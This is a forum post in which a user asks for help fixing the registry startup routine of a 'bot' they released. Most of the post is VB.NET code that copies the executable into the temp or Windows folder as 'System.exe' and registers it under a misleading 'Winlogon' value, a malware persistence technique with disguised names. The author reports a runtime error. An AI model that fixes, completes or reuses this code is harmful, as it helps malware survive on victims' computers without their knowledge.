Login Register






Startup filter_list
Author
Message
Startup #1
Hey Smile

Well... My bot that I released has a problem with registry startup, I think I tried to repair it for long enough to ask for help Biggrin

Well, here is the code:
Code:
If reg = True Then If temp = True Then If System.IO.File.Exists(Environ("temp") & "System.exe") = False Then IO.File.Copy(Application.ExecutablePath, Environ("temp") & "System.exe") End If Dim regKey As RegistryKey regKey = Registry.CurrentUser.OpenSubKey(regtxt, True) regKey.SetValue("Winlogon", Environ("temp") & "System.exe") regKey.Close() ElseIf win = True Then If System.IO.File.Exists(Environ("windir") & "System.exe") = False Then IO.File.Copy(Application.ExecutablePath, Environ("windir") & "System.exe") End If Dim regKey As RegistryKey regKey = Registry.CurrentUser.OpenSubKey(regtxt, True) regKey.SetValue("Winlogon", Environ("windir") & "System.exe") regKey.Close() ElseIf custom = True Then If System.IO.File.Exists(dir) = False Then IO.File.Copy(Application.ExecutablePath, dir & "System.exe") End If Dim regKey As RegistryKey regKey = Registry.CurrentUser.OpenSubKey(regtxt, True) regKey.SetValue("Winlogon", dir & "System.exe") regKey.Close() End If End If

Error is: Object reference not set to an instance of an object

Also, I'm not 100% sure its this Smile might be other thing, but I want to make sure, before I will completely recode everything Biggrin


Thanks alooooot!!!!

-gives a cookie-
Staff will never ever ask you for your personal information.
We know everything about you anyway.

Reply





Messages In This Thread
Startup - by 1llusion - 01-28-2011, 11:16 PM